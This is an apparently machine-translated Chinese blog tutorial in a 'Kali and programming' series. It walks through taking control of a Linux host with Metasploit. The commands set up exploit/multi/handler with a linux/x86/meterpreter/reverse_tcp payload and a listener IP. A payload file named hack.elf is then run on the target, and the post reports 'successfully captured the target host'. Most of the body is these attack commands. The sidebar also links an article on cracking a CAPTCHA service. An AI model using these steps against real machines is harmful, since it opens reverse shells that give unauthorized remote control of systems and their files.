当前位置:网站首页>Network security engineer Demo: original * * controls your server like this! (2)
Network security engineer Demo: original * * controls your server like this! (2)
2020-11-10 07:39:00 【osc_a8r2ub9u】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Linux A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 start-up Metasploit(msf)*** The test framework , As shown in the figure below .
command 1:msfconsole
step 1: Use the corresponding vulnerability to exploit the module , As shown in the figure below .
command 2:use exploit/multi/handler
step 2: Check the parameters corresponding to the vulnerability module , As shown in the figure below .
command 3:show options
step 3: Set the corresponding payload Convenient for follow-up ***, As shown in the figure below .
command :set payload linux/x86/meterpreter/reverse_tcp
step 4: Check the relevant parameters of the vulnerability module , As shown in the figure below .
command :show options
step 5: Set the corresponding parameters , As shown in the figure below .
command :set lhost 193.168.78.169
step 6: Check whether the configured parameters are successful , As shown in the figure below .
command :show options
3.2 function *** file , As shown in the figure below .
step 1: to *** The file gives execution permission , As shown in the figure below .
command :chmod +x hack.elf
step 2: perform *** file , As shown in the figure below .
command :./hack.elf
3.3 Run the exploit module , As shown in the figure below .
command :run
As shown in the figure below , Successfully captured the target host .
View the file system information of the target host , As shown in the figure below .
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢
边栏推荐
- Notes on Python cookbook 3rd (2.2): String start or end match
- C / C + + Programming Notes: C language development tank war! In memory of our lost little overlord game
- 使用call、apply和bind解决js中烦人的this,事件绑定时的this和传参问题
- mac终端Iterm2支持rz和sz的解决方案
- 解决Coursera视频无法观看的三种方法(亲测有效)
- 接缝雕刻算法:一种看似不可能的图像大小调整方法
- Hand in hand to teach you to use container service tke cluster audit troubleshooting
- JS label syntax jumps out of multiple loops
- 从零开始学习 YoMo 系列教程:开篇
- [elixir! #0073] beam 内置的内存数据库 —— ETS
猜你喜欢
Assign the corresponding key and value in the map to the object
Common settings of PLSQL developer
竞争性编程的思考:那些神话和令人震惊的事实[图]
Gets the property value of a column in the list collection object
Python cookbook 3rd note (2.1): using multiple qualifiers to split strings
Connection to XXX could not be established. Broker may not be available
Day85: Luffy: shopping cart switching price according to different validity period & shopping cart deletion operation & price settlement & foreplay of order page
极验无感验证破解
[python学习手册-笔记]001.python前言
Experiment 2
随机推荐
CUDA_ Memory model
Three ways to solve coursera video unable to watch
selenium webdriver使用click一直失效问题的几种解决方法
《Python Cookbook 3rd》笔记(2.1):使用多个界定符分割字符串
工厂方法模式
proxy 的不完整polyfill
CUDA_寄存器和局部存储器
jt-day10
Algorithm template arrangement (1)
SQL intercepts the data before and after the '.'
DB engines database ranking in November: PostgreSQL holds the top spot in the same period
一个名为不安全的类Unsafe
Coding style: SSM environment in MVC mode, code hierarchical management
jmeter接口测试--带有token的解决方法
asp.net Using serilog in core and customizing enrich
Come and learn! Development Guide for personalized recommendation system (with internet disk link)
Fear of reconstruction? I'm too late to tell you how to refactor. Now I'm here
对于程序员,那些既陌生又熟悉的计算机硬件
Unity使用transform.Rotate进行三维旋转角度出现偏差
CUDA_获取指定设备